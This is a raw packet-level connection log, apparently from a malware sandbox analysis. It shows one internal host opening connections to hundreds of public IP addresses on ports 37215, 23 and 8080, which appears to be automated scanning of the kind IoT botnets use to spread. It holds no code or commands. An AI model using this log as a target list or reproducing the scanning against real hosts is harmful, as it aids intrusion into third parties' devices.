                                              Nov 23, 2023 05:14:51.559920073 CET4783037215192.168.2.1441.37.120.12
                                              Nov 23, 2023 05:14:51.559927940 CET4783037215192.168.2.14197.240.77.237
                                              Nov 23, 2023 05:14:51.559937954 CET4783037215192.168.2.14156.85.100.112
                                              Nov 23, 2023 05:14:51.559946060 CET4783037215192.168.2.14156.73.200.84
                                              Nov 23, 2023 05:14:51.559957027 CET4783037215192.168.2.14156.76.39.66
                                              Nov 23, 2023 05:14:51.559962034 CET4783037215192.168.2.14156.31.234.166
                                              Nov 23, 2023 05:14:51.559973001 CET4783037215192.168.2.14156.95.196.189
                                              Nov 23, 2023 05:14:51.559983015 CET4783037215192.168.2.14197.223.200.20
                                              Nov 23, 2023 05:14:51.559983015 CET4783037215192.168.2.14156.107.123.82
                                              Nov 23, 2023 05:14:51.559988976 CET4783037215192.168.2.14197.188.124.221
                                              Nov 23, 2023 05:14:51.559995890 CET4783037215192.168.2.1441.1.128.4
                                              Nov 23, 2023 05:14:51.559999943 CET4783037215192.168.2.14156.86.152.214
                                              Nov 23, 2023 05:14:51.560009003 CET4783037215192.168.2.14156.27.167.22
                                              Nov 23, 2023 05:14:51.560009003 CET4783037215192.168.2.1441.182.120.144
                                              Nov 23, 2023 05:14:51.560013056 CET4783037215192.168.2.14156.51.14.230
                                              Nov 23, 2023 05:14:51.560019970 CET4783037215192.168.2.14156.158.170.67
                                              Nov 23, 2023 05:14:51.560036898 CET4783037215192.168.2.14156.189.195.182
                                              Nov 23, 2023 05:14:51.560036898 CET4783037215192.168.2.14156.151.189.52
                                              Nov 23, 2023 05:14:51.560036898 CET4783037215192.168.2.1441.248.204.88
                                              Nov 23, 2023 05:14:51.560050011 CET4783037215192.168.2.14197.56.83.224
                                              Nov 23, 2023 05:14:51.560050011 CET4783037215192.168.2.1441.208.186.91
                                              Nov 23, 2023 05:14:51.560067892 CET4783037215192.168.2.14197.9.63.107
                                              Nov 23, 2023 05:14:51.560067892 CET4783037215192.168.2.14156.125.175.250
                                              Nov 23, 2023 05:14:51.560077906 CET4783037215192.168.2.1441.218.130.108
                                              Nov 23, 2023 05:14:51.560086012 CET4783037215192.168.2.14156.207.222.45
                                              Nov 23, 2023 05:14:51.560086012 CET4783037215192.168.2.14156.30.33.179
                                              Nov 23, 2023 05:14:51.560101032 CET4783037215192.168.2.14156.237.191.83
                                              Nov 23, 2023 05:14:51.560100079 CET4783037215192.168.2.14197.176.64.172
                                              Nov 23, 2023 05:14:51.560100079 CET4783037215192.168.2.14197.246.80.219
                                              Nov 23, 2023 05:14:51.560100079 CET4783037215192.168.2.1441.117.1.122
                                              Nov 23, 2023 05:14:51.560106039 CET4783037215192.168.2.1441.106.249.175
                                              Nov 23, 2023 05:14:51.560112953 CET4783037215192.168.2.1441.126.238.86
                                              Nov 23, 2023 05:14:51.560112953 CET4783037215192.168.2.14197.251.188.212
                                              Nov 23, 2023 05:14:51.560134888 CET4783037215192.168.2.1441.246.179.179
                                              Nov 23, 2023 05:14:51.560136080 CET4783037215192.168.2.14156.119.223.172
                                              Nov 23, 2023 05:14:51.560136080 CET4783037215192.168.2.14197.176.19.189
                                              Nov 23, 2023 05:14:51.560139894 CET4783037215192.168.2.14156.254.183.249
                                              Nov 23, 2023 05:14:51.560139894 CET4783037215192.168.2.14197.195.21.97
                                              Nov 23, 2023 05:14:51.560139894 CET4783037215192.168.2.14156.66.45.255
                                              Nov 23, 2023 05:14:51.560157061 CET4783037215192.168.2.1441.171.80.156
                                              Nov 23, 2023 05:14:51.560164928 CET4783037215192.168.2.14156.207.129.100
                                              Nov 23, 2023 05:14:51.560173988 CET4783037215192.168.2.14197.230.190.159
                                              Nov 23, 2023 05:14:51.560178041 CET4783037215192.168.2.1441.220.66.38
                                              Nov 23, 2023 05:14:51.560178995 CET4783037215192.168.2.14197.230.5.104
                                              Nov 23, 2023 05:14:51.560195923 CET4783037215192.168.2.1441.95.176.243
                                              Nov 23, 2023 05:14:51.560197115 CET4783037215192.168.2.1441.111.4.61
                                              Nov 23, 2023 05:14:51.560210943 CET4783037215192.168.2.14156.253.9.76
                                              Nov 23, 2023 05:14:51.560225010 CET4783037215192.168.2.1441.128.152.241
                                              Nov 23, 2023 05:14:51.560225010 CET4783037215192.168.2.14197.237.95.84
                                              Nov 23, 2023 05:14:51.560241938 CET4783037215192.168.2.14197.71.71.111
                                              Nov 23, 2023 05:14:51.560241938 CET4783037215192.168.2.14156.104.134.80
                                              Nov 23, 2023 05:14:51.560246944 CET4783037215192.168.2.14156.149.104.57
                                              Nov 23, 2023 05:14:51.560247898 CET4783037215192.168.2.1441.146.85.115
                                              Nov 23, 2023 05:14:51.560250044 CET4783037215192.168.2.14156.125.149.94
                                              Nov 23, 2023 05:14:51.560264111 CET4783037215192.168.2.1441.132.93.33
                                              Nov 23, 2023 05:14:51.560264111 CET4783037215192.168.2.14156.62.221.125
                                              Nov 23, 2023 05:14:51.560269117 CET4783037215192.168.2.1441.34.127.48
                                              Nov 23, 2023 05:14:51.560280085 CET4783037215192.168.2.14156.212.155.119
                                              Nov 23, 2023 05:14:51.560280085 CET4783037215192.168.2.1441.170.63.60
                                              Nov 23, 2023 05:14:51.560286999 CET4783037215192.168.2.1441.31.26.161
                                              Nov 23, 2023 05:14:51.560288906 CET4783037215192.168.2.1441.201.131.33
                                              Nov 23, 2023 05:14:51.560305119 CET4783037215192.168.2.1441.221.57.84
                                              Nov 23, 2023 05:14:51.560306072 CET4783037215192.168.2.1441.58.108.52
                                              Nov 23, 2023 05:14:51.560307026 CET4783037215192.168.2.14156.63.87.178
                                              Nov 23, 2023 05:14:51.560307980 CET4783037215192.168.2.14156.52.252.249
                                              Nov 23, 2023 05:14:51.560322046 CET4783037215192.168.2.1441.113.17.91
                                              Nov 23, 2023 05:14:51.560329914 CET4783037215192.168.2.1441.55.30.122
                                              Nov 23, 2023 05:14:51.560333014 CET4783037215192.168.2.14197.191.144.253
                                              Nov 23, 2023 05:14:51.560334921 CET4783037215192.168.2.1441.252.159.44
                                              Nov 23, 2023 05:14:51.560354948 CET4783037215192.168.2.14156.239.104.230
                                              Nov 23, 2023 05:14:51.560359955 CET4783037215192.168.2.14197.252.57.151
                                              Nov 23, 2023 05:14:51.560369015 CET4783037215192.168.2.1441.147.149.149
                                              Nov 23, 2023 05:14:51.560385942 CET4783037215192.168.2.14197.182.199.179
                                              Nov 23, 2023 05:14:51.560385942 CET4783037215192.168.2.1441.235.151.137
                                              Nov 23, 2023 05:14:51.560399055 CET4783037215192.168.2.14156.239.107.71
                                              Nov 23, 2023 05:14:51.560400963 CET4783037215192.168.2.14197.5.150.141
                                              Nov 23, 2023 05:14:51.560406923 CET4783037215192.168.2.1441.117.165.227
                                              Nov 23, 2023 05:14:51.560412884 CET4783037215192.168.2.14156.106.116.227
                                              Nov 23, 2023 05:14:51.560415030 CET4783037215192.168.2.14197.239.69.76
                                              Nov 23, 2023 05:14:51.560425043 CET4783037215192.168.2.14156.103.62.250
                                              Nov 23, 2023 05:14:51.560435057 CET4783037215192.168.2.1441.160.95.12
                                              Nov 23, 2023 05:14:51.560437918 CET4783037215192.168.2.1441.47.200.24
                                              Nov 23, 2023 05:14:51.560439110 CET4783037215192.168.2.14197.166.182.138
                                              Nov 23, 2023 05:14:51.560455084 CET4783037215192.168.2.1441.251.187.32
                                              Nov 23, 2023 05:14:51.560460091 CET4783037215192.168.2.14156.64.62.127
                                              Nov 23, 2023 05:14:51.560465097 CET4783037215192.168.2.14156.79.218.65
                                              Nov 23, 2023 05:14:51.560465097 CET4783037215192.168.2.1441.153.27.122
                                              Nov 23, 2023 05:14:51.560482025 CET4783037215192.168.2.14156.130.44.74
                                              Nov 23, 2023 05:14:51.560484886 CET4783037215192.168.2.14156.2.249.195
                                              Nov 23, 2023 05:14:51.560487032 CET4783037215192.168.2.14156.16.112.170
                                              Nov 23, 2023 05:14:51.560487032 CET4783037215192.168.2.14197.29.120.222
                                              Nov 23, 2023 05:14:51.560499907 CET4783037215192.168.2.14156.64.246.14
                                              Nov 23, 2023 05:14:51.560503006 CET4783037215192.168.2.14156.198.180.19
                                              Nov 23, 2023 05:14:51.560507059 CET4783037215192.168.2.14197.216.14.136
                                              Nov 23, 2023 05:14:51.560522079 CET4783037215192.168.2.14197.188.233.197
                                              Nov 23, 2023 05:14:51.560522079 CET4783037215192.168.2.1441.18.169.82
                                              Nov 23, 2023 05:14:51.560522079 CET4783037215192.168.2.1441.120.32.204
                                              Nov 23, 2023 05:14:51.560524940 CET4783037215192.168.2.14156.134.214.242
                                              Nov 23, 2023 05:14:51.560540915 CET4783037215192.168.2.1441.94.149.201
                                              Nov 23, 2023 05:14:51.560542107 CET4783037215192.168.2.14156.19.240.50
                                              Nov 23, 2023 05:14:51.560551882 CET4783037215192.168.2.14156.131.16.20
                                              Nov 23, 2023 05:14:51.560559988 CET4783037215192.168.2.1441.173.241.190
                                              Nov 23, 2023 05:14:51.560564041 CET4783037215192.168.2.14197.206.66.145
                                              Nov 23, 2023 05:14:51.560573101 CET4783037215192.168.2.14197.57.121.43
                                              Nov 23, 2023 05:14:51.560581923 CET4783037215192.168.2.1441.174.168.124
                                              Nov 23, 2023 05:14:51.560583115 CET4783037215192.168.2.1441.50.91.92
                                              Nov 23, 2023 05:14:51.560591936 CET4783037215192.168.2.14156.34.143.116
                                              Nov 23, 2023 05:14:51.560597897 CET4783037215192.168.2.14197.145.76.96
                                              Nov 23, 2023 05:14:51.560600042 CET4783037215192.168.2.14156.38.101.245
                                              Nov 23, 2023 05:14:51.560600042 CET4783037215192.168.2.14156.229.33.26
                                              Nov 23, 2023 05:14:51.560602903 CET4783037215192.168.2.14197.68.17.223
                                              Nov 23, 2023 05:14:51.560616970 CET4783037215192.168.2.14156.166.74.108
                                              Nov 23, 2023 05:14:51.560616970 CET4783037215192.168.2.1441.224.73.168
                                              Nov 23, 2023 05:14:51.560626984 CET4783037215192.168.2.1441.204.254.51
                                              Nov 23, 2023 05:14:51.560637951 CET4783037215192.168.2.14156.169.251.99
                                              Nov 23, 2023 05:14:51.560637951 CET4783037215192.168.2.14156.107.48.99
                                              Nov 23, 2023 05:14:51.560645103 CET4783037215192.168.2.14156.199.7.212
                                              Nov 23, 2023 05:14:51.560655117 CET4783037215192.168.2.14156.176.0.239
                                              Nov 23, 2023 05:14:51.560662031 CET4783037215192.168.2.1441.51.135.224
                                              Nov 23, 2023 05:14:51.560672045 CET4783037215192.168.2.14197.0.247.78
                                              Nov 23, 2023 05:14:51.560672045 CET4783037215192.168.2.14197.76.100.42
                                              Nov 23, 2023 05:14:51.560673952 CET4783037215192.168.2.14156.33.20.130
                                              Nov 23, 2023 05:14:51.560686111 CET4783037215192.168.2.1441.11.229.132
                                              Nov 23, 2023 05:14:51.560688972 CET4783037215192.168.2.1441.159.2.236
                                              Nov 23, 2023 05:14:51.560698032 CET4783037215192.168.2.14197.243.171.72
                                              Nov 23, 2023 05:14:51.560698032 CET4783037215192.168.2.1441.82.113.244
                                              Nov 23, 2023 05:14:51.560704947 CET4783037215192.168.2.14156.95.213.209
                                              Nov 23, 2023 05:14:51.560719967 CET4783037215192.168.2.14156.195.72.23
                                              Nov 23, 2023 05:14:51.560728073 CET4783037215192.168.2.1441.42.192.150
                                              Nov 23, 2023 05:14:51.560729027 CET4783037215192.168.2.14197.137.28.48
                                              Nov 23, 2023 05:14:51.560738087 CET4783037215192.168.2.14197.63.160.111
                                              Nov 23, 2023 05:14:51.560744047 CET4783037215192.168.2.14197.104.210.139
                                              Nov 23, 2023 05:14:51.560744047 CET4783037215192.168.2.1441.104.160.50
                                              Nov 23, 2023 05:14:51.560758114 CET4783037215192.168.2.14156.68.84.136
                                              Nov 23, 2023 05:14:51.560762882 CET4783037215192.168.2.1441.71.215.94
                                              Nov 23, 2023 05:14:51.560762882 CET4783037215192.168.2.14197.133.68.36
                                              Nov 23, 2023 05:14:51.560766935 CET4783037215192.168.2.14156.140.68.239
                                              Nov 23, 2023 05:14:51.560780048 CET4783037215192.168.2.1441.33.119.247
                                              Nov 23, 2023 05:14:51.560782909 CET4783037215192.168.2.14197.11.154.23
                                              Nov 23, 2023 05:14:51.560786963 CET4783037215192.168.2.14156.254.123.253
                                              Nov 23, 2023 05:14:51.560802937 CET4783037215192.168.2.1441.163.156.116
                                              Nov 23, 2023 05:14:51.560813904 CET4783037215192.168.2.14156.127.70.133
                                              Nov 23, 2023 05:14:51.560817957 CET4783037215192.168.2.14156.205.107.185
                                              Nov 23, 2023 05:14:51.560827017 CET4783037215192.168.2.14156.91.186.61
                                              Nov 23, 2023 05:14:51.560839891 CET4783037215192.168.2.14156.235.188.159
                                              Nov 23, 2023 05:14:51.560847998 CET4783037215192.168.2.14197.191.15.13
                                              Nov 23, 2023 05:14:51.560848951 CET4783037215192.168.2.14197.125.221.38
                                              Nov 23, 2023 05:14:51.560853958 CET4783037215192.168.2.14156.169.254.178
                                              Nov 23, 2023 05:14:51.560853958 CET4783037215192.168.2.1441.45.219.5
                                              Nov 23, 2023 05:14:51.560863972 CET4783037215192.168.2.14156.207.17.124
                                              Nov 23, 2023 05:14:51.560868025 CET4783037215192.168.2.1441.34.109.110
                                              Nov 23, 2023 05:14:51.560873985 CET4783037215192.168.2.14197.117.89.14
                                              Nov 23, 2023 05:14:51.560877085 CET4783037215192.168.2.14197.133.149.134
                                              Nov 23, 2023 05:14:51.560889959 CET4783037215192.168.2.1441.107.47.62
                                              Nov 23, 2023 05:14:51.560889959 CET4783037215192.168.2.14156.175.176.201
                                              Nov 23, 2023 05:14:51.560889959 CET4783037215192.168.2.14156.110.228.108
                                              Nov 23, 2023 05:14:51.560900927 CET4783037215192.168.2.1441.206.222.30
                                              Nov 23, 2023 05:14:51.560904980 CET4783037215192.168.2.14197.99.178.70
                                              Nov 23, 2023 05:14:51.560911894 CET4783037215192.168.2.14197.170.201.24
                                              Nov 23, 2023 05:14:51.560921907 CET4783037215192.168.2.1441.5.20.219
                                              Nov 23, 2023 05:14:51.671564102 CET2347828189.248.33.244192.168.2.14
                                              Nov 23, 2023 05:14:51.753793001 CET3721547830156.19.240.50192.168.2.14
                                              Nov 23, 2023 05:14:51.767323017 CET235100895.9.134.44192.168.2.14
                                              Nov 23, 2023 05:14:51.767384052 CET5100823192.168.2.1495.9.134.44
                                              Nov 23, 2023 05:14:51.767503023 CET5100823192.168.2.1495.9.134.44
                                              Nov 23, 2023 05:14:51.770164013 CET2347828201.179.200.71192.168.2.14
                                              Nov 23, 2023 05:14:51.770219088 CET4782823192.168.2.14201.179.200.71
                                              Nov 23, 2023 05:14:51.789812088 CET234562495.181.105.1192.168.2.14
                                              Nov 23, 2023 05:14:51.798413992 CET234566095.181.105.1192.168.2.14
                                              Nov 23, 2023 05:14:51.798475027 CET4566023192.168.2.1495.181.105.1
                                              Nov 23, 2023 05:14:51.798516035 CET5891423192.168.2.14201.179.200.71
                                              Nov 23, 2023 05:14:51.818388939 CET2347828113.40.183.81192.168.2.14
                                              Nov 23, 2023 05:14:51.821604013 CET2347828221.144.254.81192.168.2.14
                                              Nov 23, 2023 05:14:51.826682091 CET2347828115.12.11.46192.168.2.14
                                              Nov 23, 2023 05:14:51.846225977 CET3721547830197.56.83.224192.168.2.14
                                              Nov 23, 2023 05:14:51.869493008 CET2347828202.162.208.33192.168.2.14
                                              Nov 23, 2023 05:14:51.870404005 CET3721547830156.253.9.76192.168.2.14
                                              Nov 23, 2023 05:14:51.894733906 CET2347828103.131.217.200192.168.2.14
                                              Nov 23, 2023 05:14:51.894788980 CET4782823192.168.2.14103.131.217.200
                                              Nov 23, 2023 05:14:51.977619886 CET4239037215192.168.2.14156.226.15.209
                                              Nov 23, 2023 05:14:51.977648973 CET3565237215192.168.2.14156.254.88.148
                                              Nov 23, 2023 05:14:52.010778904 CET235100895.9.134.44192.168.2.14
                                              Nov 23, 2023 05:14:52.010797977 CET235100895.9.134.44192.168.2.14
                                              Nov 23, 2023 05:14:52.010906935 CET5100823192.168.2.1495.9.134.44
                                              Nov 23, 2023 05:14:52.010906935 CET5100823192.168.2.1495.9.134.44
                                              Nov 23, 2023 05:14:52.011212111 CET5885023192.168.2.14103.131.217.200
                                              Nov 23, 2023 05:14:52.041577101 CET4422637215192.168.2.14156.235.103.206
                                              Nov 23, 2023 05:14:52.043651104 CET2358914201.179.200.71192.168.2.14
                                              Nov 23, 2023 05:14:52.043790102 CET5891423192.168.2.14201.179.200.71
                                              Nov 23, 2023 05:14:52.046089888 CET478168080192.168.2.1431.61.149.38
                                              Nov 23, 2023 05:14:52.046091080 CET478168080192.168.2.1495.236.41.119
                                              Nov 23, 2023 05:14:52.046102047 CET478168080192.168.2.1462.37.251.231
                                              Nov 23, 2023 05:14:52.046125889 CET478168080192.168.2.1494.15.167.105
                                              Nov 23, 2023 05:14:52.046128988 CET478168080192.168.2.1494.46.114.212
                                              Nov 23, 2023 05:14:52.046128988 CET478168080192.168.2.1495.203.28.61
                                              Nov 23, 2023 05:14:52.046128988 CET478168080192.168.2.1462.170.97.160
                                              Nov 23, 2023 05:14:52.046125889 CET478168080192.168.2.1494.255.33.74
                                              Nov 23, 2023 05:14:52.046149015 CET478168080192.168.2.1431.240.233.0
                                              Nov 23, 2023 05:14:52.046149015 CET478168080192.168.2.1495.129.236.158
                                              Nov 23, 2023 05:14:52.046152115 CET478168080192.168.2.1495.217.64.32
                                              Nov 23, 2023 05:14:52.046156883 CET478168080192.168.2.1494.27.119.125
                                              Nov 23, 2023 05:14:52.046158075 CET478168080192.168.2.1485.242.36.141
                                              Nov 23, 2023 05:14:52.046158075 CET478168080192.168.2.1431.105.223.81
                                              Nov 23, 2023 05:14:52.046163082 CET478168080192.168.2.1485.241.16.83
                                              Nov 23, 2023 05:14:52.046164036 CET478168080192.168.2.1494.241.151.196
                                              Nov 23, 2023 05:14:52.046190977 CET478168080192.168.2.1494.103.53.17
                                              Nov 23, 2023 05:14:52.046192884 CET478168080192.168.2.1431.42.109.140
                                              Nov 23, 2023 05:14:52.046192884 CET478168080192.168.2.1431.71.81.218
                                              Nov 23, 2023 05:14:52.046194077 CET478168080192.168.2.1495.255.73.112
                                              Nov 23, 2023 05:14:52.046195030 CET478168080192.168.2.1431.37.254.134
                                              Nov 23, 2023 05:14:52.046196938 CET478168080192.168.2.1462.24.206.110
                                              Nov 23, 2023 05:14:52.046196938 CET478168080192.168.2.1495.137.68.161
                                              Nov 23, 2023 05:14:52.046199083 CET478168080192.168.2.1431.148.65.218
                                              Nov 23, 2023 05:14:52.046199083 CET478168080192.168.2.1462.153.253.195
                                              Nov 23, 2023 05:14:52.046205044 CET478168080192.168.2.1494.11.10.252
                                              Nov 23, 2023 05:14:52.046205044 CET478168080192.168.2.1494.229.141.148
                                              Nov 23, 2023 05:14:52.046227932 CET478168080192.168.2.1494.131.143.117
                                              Nov 23, 2023 05:14:52.046251059 CET478168080192.168.2.1462.51.248.170
                                              Nov 23, 2023 05:14:52.046251059 CET478168080192.168.2.1462.171.151.94
                                              Nov 23, 2023 05:14:52.046251059 CET478168080192.168.2.1431.67.200.190
                                              Nov 23, 2023 05:14:52.046253920 CET478168080192.168.2.1495.40.230.30
                                              Nov 23, 2023 05:14:52.046255112 CET478168080192.168.2.1485.79.54.192
                                              Nov 23, 2023 05:14:52.046255112 CET478168080192.168.2.1462.223.198.114
                                              Nov 23, 2023 05:14:52.046255112 CET478168080192.168.2.1485.234.126.228
                                              Nov 23, 2023 05:14:52.046257973 CET478168080192.168.2.1494.36.49.94
                                              Nov 23, 2023 05:14:52.046257973 CET478168080192.168.2.1462.235.1.185
                                              Nov 23, 2023 05:14:52.046257973 CET478168080192.168.2.1462.222.131.142
                                              Nov 23, 2023 05:14:52.046257973 CET478168080192.168.2.1485.149.129.140
                                              Nov 23, 2023 05:14:52.046257973 CET478168080192.168.2.1485.143.217.23
                                              Nov 23, 2023 05:14:52.046258926 CET478168080192.168.2.1431.45.198.199
                                              Nov 23, 2023 05:14:52.046257973 CET478168080192.168.2.1485.104.46.24
                                              Nov 23, 2023 05:14:52.046261072 CET478168080192.168.2.1495.83.48.62
                                              Nov 23, 2023 05:14:52.046258926 CET478168080192.168.2.1485.29.56.14
                                              Nov 23, 2023 05:14:52.046257973 CET478168080192.168.2.1485.176.92.247
                                              Nov 23, 2023 05:14:52.046260118 CET478168080192.168.2.1431.71.252.143
                                              Nov 23, 2023 05:14:52.046261072 CET478168080192.168.2.1495.153.122.20
                                              Nov 23, 2023 05:14:52.046260118 CET478168080192.168.2.1485.69.151.128
                                              Nov 23, 2023 05:14:52.046261072 CET478168080192.168.2.1462.184.155.117
                                              Nov 23, 2023 05:14:52.046260118 CET478168080192.168.2.1485.140.178.41
                                              Nov 23, 2023 05:14:52.046258926 CET478168080192.168.2.1494.86.29.14
                                              Nov 23, 2023 05:14:52.046260118 CET478168080192.168.2.1462.175.124.73
                                              Nov 23, 2023 05:14:52.046260118 CET478168080192.168.2.1485.109.67.83
                                              Nov 23, 2023 05:14:52.046260118 CET478168080192.168.2.1485.178.15.52
                                              Nov 23, 2023 05:14:52.046329021 CET478168080192.168.2.1431.38.211.125
                                              Nov 23, 2023 05:14:52.046329021 CET478168080192.168.2.1485.109.26.126
                                              Nov 23, 2023 05:14:52.046329021 CET478168080192.168.2.1494.113.51.218
                                              Nov 23, 2023 05:14:52.046329975 CET478168080192.168.2.1494.24.125.0
                                              Nov 23, 2023 05:14:52.046329021 CET478168080192.168.2.1495.168.177.154
                                              Nov 23, 2023 05:14:52.046329975 CET478168080192.168.2.1462.216.252.93
                                              Nov 23, 2023 05:14:52.046329021 CET478168080192.168.2.1462.189.133.222
                                              Nov 23, 2023 05:14:52.046333075 CET478168080192.168.2.1462.61.227.200
                                              Nov 23, 2023 05:14:52.046329975 CET478168080192.168.2.1494.126.228.215
                                              Nov 23, 2023 05:14:52.046334982 CET478168080192.168.2.1495.242.84.208
                                              Nov 23, 2023 05:14:52.046334982 CET478168080192.168.2.1494.27.199.190
                                              Nov 23, 2023 05:14:52.046336889 CET478168080192.168.2.1485.199.139.75
                                              Nov 23, 2023 05:14:52.046334028 CET478168080192.168.2.1495.38.38.84
                                              Nov 23, 2023 05:14:52.046334982 CET478168080192.168.2.1494.51.1.240
                                              Nov 23, 2023 05:14:52.046334028 CET478168080192.168.2.1494.9.65.207
                                              Nov 23, 2023 05:14:52.046334982 CET478168080192.168.2.1495.127.67.118
                                              Nov 23, 2023 05:14:52.046334982 CET478168080192.168.2.1494.248.183.188
                                              Nov 23, 2023 05:14:52.046336889 CET478168080192.168.2.1431.249.23.36
                                              Nov 23, 2023 05:14:52.046334982 CET478168080192.168.2.1494.54.245.137
                                              Nov 23, 2023 05:14:52.046336889 CET478168080192.168.2.1462.106.209.54
                                              Nov 23, 2023 05:14:52.046333075 CET478168080192.168.2.1485.147.78.214
                                              Nov 23, 2023 05:14:52.046336889 CET478168080192.168.2.1495.235.47.0
                                              Nov 23, 2023 05:14:52.046334028 CET478168080192.168.2.1431.188.50.233
                                              Nov 23, 2023 05:14:52.046336889 CET478168080192.168.2.1495.122.124.220
                                              Nov 23, 2023 05:14:52.046336889 CET478168080192.168.2.1462.120.135.195
                                              Nov 23, 2023 05:14:52.046336889 CET478168080192.168.2.1494.153.49.185
                                              Nov 23, 2023 05:14:52.046334028 CET478168080192.168.2.1485.21.67.228
                                              Nov 23, 2023 05:14:52.046334028 CET478168080192.168.2.1494.69.89.223
                                              Nov 23, 2023 05:14:52.046336889 CET478168080192.168.2.1462.16.190.238
                                              Nov 23, 2023 05:14:52.046336889 CET478168080192.168.2.1485.84.123.69
                                              Nov 23, 2023 05:14:52.046360016 CET478168080192.168.2.1485.62.135.170
                                              Nov 23, 2023 05:14:52.046360016 CET478168080192.168.2.1494.203.105.175
                                              Nov 23, 2023 05:14:52.046361923 CET478168080192.168.2.1431.159.238.34
                                              Nov 23, 2023 05:14:52.046361923 CET478168080192.168.2.1494.68.247.126
                                              Nov 23, 2023 05:14:52.046361923 CET478168080192.168.2.1494.143.15.217
                                              Nov 23, 2023 05:14:52.046361923 CET478168080192.168.2.1431.201.76.3
                                              Nov 23, 2023 05:14:52.046361923 CET478168080192.168.2.1485.177.67.133
                                              Nov 23, 2023 05:14:52.046365023 CET478168080192.168.2.1431.41.124.183
                                              Nov 23, 2023 05:14:52.046365023 CET478168080192.168.2.1462.62.120.146
                                              Nov 23, 2023 05:14:52.046365023 CET478168080192.168.2.1494.204.217.113
                                              Nov 23, 2023 05:14:52.046365023 CET478168080192.168.2.1431.144.39.221
                                              Nov 23, 2023 05:14:52.046365023 CET478168080192.168.2.1485.196.209.43
                                              Nov 23, 2023 05:14:52.046365023 CET478168080192.168.2.1494.170.227.166
                                              Nov 23, 2023 05:14:52.046365023 CET478168080192.168.2.1495.84.36.173
                                              Nov 23, 2023 05:14:52.046365023 CET478168080192.168.2.1431.232.185.140
                                              Nov 23, 2023 05:14:52.046380997 CET478168080192.168.2.1431.89.101.128
                                              Nov 23, 2023 05:14:52.046380997 CET478168080192.168.2.1462.113.181.162
                                              Nov 23, 2023 05:14:52.046380997 CET478168080192.168.2.1494.129.7.39
                                              Nov 23, 2023 05:14:52.046380997 CET478168080192.168.2.1462.28.6.81
                                              Nov 23, 2023 05:14:52.046380997 CET478168080192.168.2.1485.128.202.92
                                              Nov 23, 2023 05:14:52.046380997 CET478168080192.168.2.1485.248.8.203
                                              Nov 23, 2023 05:14:52.046396017 CET478168080192.168.2.1462.228.58.223
                                              Nov 23, 2023 05:14:52.046396017 CET478168080192.168.2.1462.99.217.73
                                              Nov 23, 2023 05:14:52.046396017 CET478168080192.168.2.1431.85.110.240
                                              Nov 23, 2023 05:14:52.046405077 CET478168080192.168.2.1462.51.109.27
                                              Nov 23, 2023 05:14:52.046405077 CET478168080192.168.2.1485.89.17.24
                                              Nov 23, 2023 05:14:52.046405077 CET478168080192.168.2.1494.93.103.47
                                              Nov 23, 2023 05:14:52.046405077 CET478168080192.168.2.1431.95.124.157
                                              Nov 23, 2023 05:14:52.046405077 CET478168080192.168.2.1462.207.34.201
                                              Nov 23, 2023 05:14:52.046405077 CET478168080192.168.2.1431.159.40.65
                                              Nov 23, 2023 05:14:52.046405077 CET478168080192.168.2.1485.250.112.56
                                              Nov 23, 2023 05:14:52.046413898 CET478168080192.168.2.1495.30.11.78
                                              Nov 23, 2023 05:14:52.046413898 CET478168080192.168.2.1431.47.217.155
                                              Nov 23, 2023 05:14:52.046413898 CET478168080192.168.2.1494.62.251.117
                                              Nov 23, 2023 05:14:52.046413898 CET478168080192.168.2.1485.110.101.248
                                              Nov 23, 2023 05:14:52.046417952 CET478168080192.168.2.1431.14.72.124
                                              Nov 23, 2023 05:14:52.046417952 CET478168080192.168.2.1462.191.113.20
                                              Nov 23, 2023 05:14:52.046417952 CET478168080192.168.2.1485.160.79.201
                                              Nov 23, 2023 05:14:52.046417952 CET478168080192.168.2.1495.2.3.76
                                              Nov 23, 2023 05:14:52.046422005 CET478168080192.168.2.1462.20.138.8
                                              Nov 23, 2023 05:14:52.046422005 CET478168080192.168.2.1494.210.144.165
                                              Nov 23, 2023 05:14:52.046422005 CET478168080192.168.2.1494.89.158.56
                                              Nov 23, 2023 05:14:52.046422005 CET478168080192.168.2.1495.48.186.227
                                              Nov 23, 2023 05:14:52.046422005 CET478168080192.168.2.1485.233.57.169
                                              Nov 23, 2023 05:14:52.046422005 CET478168080192.168.2.1431.111.198.221
                                              Nov 23, 2023 05:14:52.046435118 CET478168080192.168.2.1485.38.174.247
                                              Nov 23, 2023 05:14:52.046435118 CET478168080192.168.2.1495.157.6.61
                                              Nov 23, 2023 05:14:52.046435118 CET478168080192.168.2.1485.63.95.140
                                              Nov 23, 2023 05:14:52.046441078 CET478168080192.168.2.1485.253.222.181
                                              Nov 23, 2023 05:14:52.046447039 CET478168080192.168.2.1495.220.230.67
                                              Nov 23, 2023 05:14:52.046447039 CET478168080192.168.2.1462.199.178.144
                                              Nov 23, 2023 05:14:52.046447039 CET478168080192.168.2.1494.43.88.247
                                              Nov 23, 2023 05:14:52.046447039 CET478168080192.168.2.1494.133.104.240
                                              Nov 23, 2023 05:14:52.046458006 CET478168080192.168.2.1494.194.155.167
                                              Nov 23, 2023 05:14:52.046458006 CET478168080192.168.2.1495.77.40.177
                                              Nov 23, 2023 05:14:52.046468973 CET478168080192.168.2.1485.105.179.211
                                              Nov 23, 2023 05:14:52.046471119 CET478168080192.168.2.1494.132.92.46
                                              Nov 23, 2023 05:14:52.046487093 CET478168080192.168.2.1485.13.218.184
                                              Nov 23, 2023 05:14:52.046489954 CET478168080192.168.2.1495.160.152.97
                                              Nov 23, 2023 05:14:52.046493053 CET478168080192.168.2.1462.37.113.184
                                              Nov 23, 2023 05:14:52.046493053 CET478168080192.168.2.1485.139.11.121
                                              Nov 23, 2023 05:14:52.046493053 CET478168080192.168.2.1495.13.107.219
                                              Nov 23, 2023 05:14:52.046493053 CET478168080192.168.2.1485.100.178.75
                                              Nov 23, 2023 05:14:52.046493053 CET478168080192.168.2.1485.109.228.97
                                              Nov 23, 2023 05:14:52.046499014 CET478168080192.168.2.1485.227.196.93
                                              Nov 23, 2023 05:14:52.046503067 CET478168080192.168.2.1494.57.21.168
                                              Nov 23, 2023 05:14:52.046504021 CET478168080192.168.2.1495.56.228.113
                                              Nov 23, 2023 05:14:52.046521902 CET478168080192.168.2.1431.251.236.16
                                              Nov 23, 2023 05:14:52.046540976 CET478168080192.168.2.1495.133.154.53
                                              Nov 23, 2023 05:14:52.046540976 CET478168080192.168.2.1495.24.24.42
                                              Nov 23, 2023 05:14:52.046545029 CET478168080192.168.2.1495.123.42.106
                                              Nov 23, 2023 05:14:52.046547890 CET478168080192.168.2.1485.16.206.168
